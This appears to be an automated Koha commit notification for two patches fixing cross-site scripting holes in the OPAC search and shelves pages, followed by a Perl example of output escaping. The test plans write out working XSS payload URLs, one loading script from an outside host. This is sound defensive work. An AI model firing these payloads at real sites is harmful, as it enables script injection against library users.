[koha-commits] main Koha release repository branch 3.14.x updated. v3.14.15-11-gb9ebf70

Git repo owner gitmaster at git.koha-community.org
Tue Jun 23 11:51:29 CEST 2015


This is an automated email from the git hooks/post-receive script. It was
generated because a ref change was pushed to the repository containing
the project "main Koha release repository".

The branch, 3.14.x has been updated
       via  b9ebf70d9583d761d8db9eaf503ebe9498bc01e0 (commit)
       via  f62614fc091ba5b929189d12be10eae2643357d7 (commit)
      from  b5a0d0a72b2f7ee263184ec98a7ce1dd14b26315 (commit)

Those revisions listed above that are new to this repository have
not appeared on any other notification email; so we list those
revisions in full, below.

- Log -----------------------------------------------------------------
commit b9ebf70d9583d761d8db9eaf503ebe9498bc01e0
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date:   Fri Jun 19 11:41:45 2015 +1200

    Bug 14418: More XSS vulnerabilities in opac-shelves.pl
    
    To test:
    1/ Hit a URL like
    /cgi-bin/koha/opac-shelves.pl?viewshelf=7&op=modif&display="><script>alert('oh
    noes')</script>  where the id is a valid shelf id
    2/ Notice the js is executed
    3/ Apply patch
    4/ Reload page
    5/ Notice input is now escaped on display
    
    Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
    Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
    Tested in Debian, couldn't reproduce the alert in Iceweasel, but in
    Chromium. Patch fixes it.
    Signed-off-by: Tomas Cohen Arazi <tomascohen at unc.edu.ar>
    
    (cherry picked from commit cd4c959f7226b060f683f5571f030cc2df7539ca)
    (cherry picked from commit f9569612b65798dce457b5650a5b5162b80b12e8)
    Signed-off-by: Fridolin Somers <fridolin.somers at biblibre.com>

commit f62614fc091ba5b929189d12be10eae2643357d7
Author: Chris Cormack <chrisc at catalyst.net.nz>
Date:   Fri Jun 19 09:25:22 2015 +1200

    Bug 14418: XSS Vulnerabilities in OPAC search
    
    Fix for /cgi-bin/koha/opac-search.pl
    
    To test:
    
    1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
    src='http://cst.sba-research.org/x.js'/>&q=a
    2/ Notice the js is executed
    3/ Apply patch
    4/ Reload page, notice it is no longer executed
    5/ Test that the RSS links still work
    
    Signed-off-by: Jonathan Druart <jonathan.druart at koha-community.org>
    Signed-off-by: Katrin Fischer <katrin.fischer at bsz-bw.de>
    Confirmed bug and that the patch fixes it.
    Signed-off-by: Tomas Cohen Arazi <tomascohen at unc.edu.ar>
    
    (cherry picked from commit 45dd7754019e8f525c8d52bf33c41016e5ccbfab)
    Signed-off-by: Chris Cormack <chrisc at catalyst.net.nz>
    (cherry picked from commit 21cc992e7e5a35ccf1b7614cae638c9863e2a35f)
    Signed-off-by: Fridolin Somers <fridolin.somers at biblibre.com>
    
    Conflicts:
    	koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt

-----------------------------------------------------------------------

Summary of changes:
 koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt |    6 +++---
 koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-shelves.tt |    2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)
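As an added illustration, not part of these commits or of Koha's own code: a small Perl/Template Toolkit script that renders the test plan's payload through an unfiltered `[% display %]` and through the TT `html` filter, so the output escaping the patch relies on can be seen directly. The two template fragments are hypothetical stand-ins for the attribute in opac-shelves.tt, not the real template.

```perl
#!/usr/bin/perl
# Added example (not Koha code): shows why a raw "display" parameter
# interpolated into a Template Toolkit template breaks out of its
# attribute, and what the "| html" output filter changes.
use strict;
use warnings;
use Template;

# Constructed payload, same shape as the one in the bug's test plan.
my $display = q{"><script>alert('oh noes')</script>};

# Hypothetical minimal fragments standing in for the attribute in
# opac-shelves.tt; the real template is not reproduced here.
my $unescaped = q{<input type="hidden" name="display" value="[% display %]" />};
my $escaped   = q{<input type="hidden" name="display" value="[% display | html %]" />};

# Render a template string with the given variables and return the output.
sub render {
    my ( $tmpl, $vars ) = @_;
    my $tt = Template->new() or die Template->error();
    my $out = '';
    $tt->process( \$tmpl, $vars, \$out ) or die $tt->error();
    return $out;
}

my $bad  = render( $unescaped, { display => $display } );
my $good = render( $escaped,   { display => $display } );

print "Unescaped (attribute closed early, script element is live):\n$bad\n\n";
print "With | html (payload stays inert text inside the attribute):\n$good\n";

# Sanity check a reviewer would add: the filtered output must contain no
# raw tag, since & < > " are all turned into entities by the html filter.
die "escaping failed" if $good =~ /<script/i;
```

The same pattern applies to the `tag` parameter in opac-results.tt; any value that originates from the query string and is echoed into markup needs the filter on every occurrence, which is why a fix of this kind touches each interpolation site separately.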


hooks/post-receive
-- 
main Koha release repository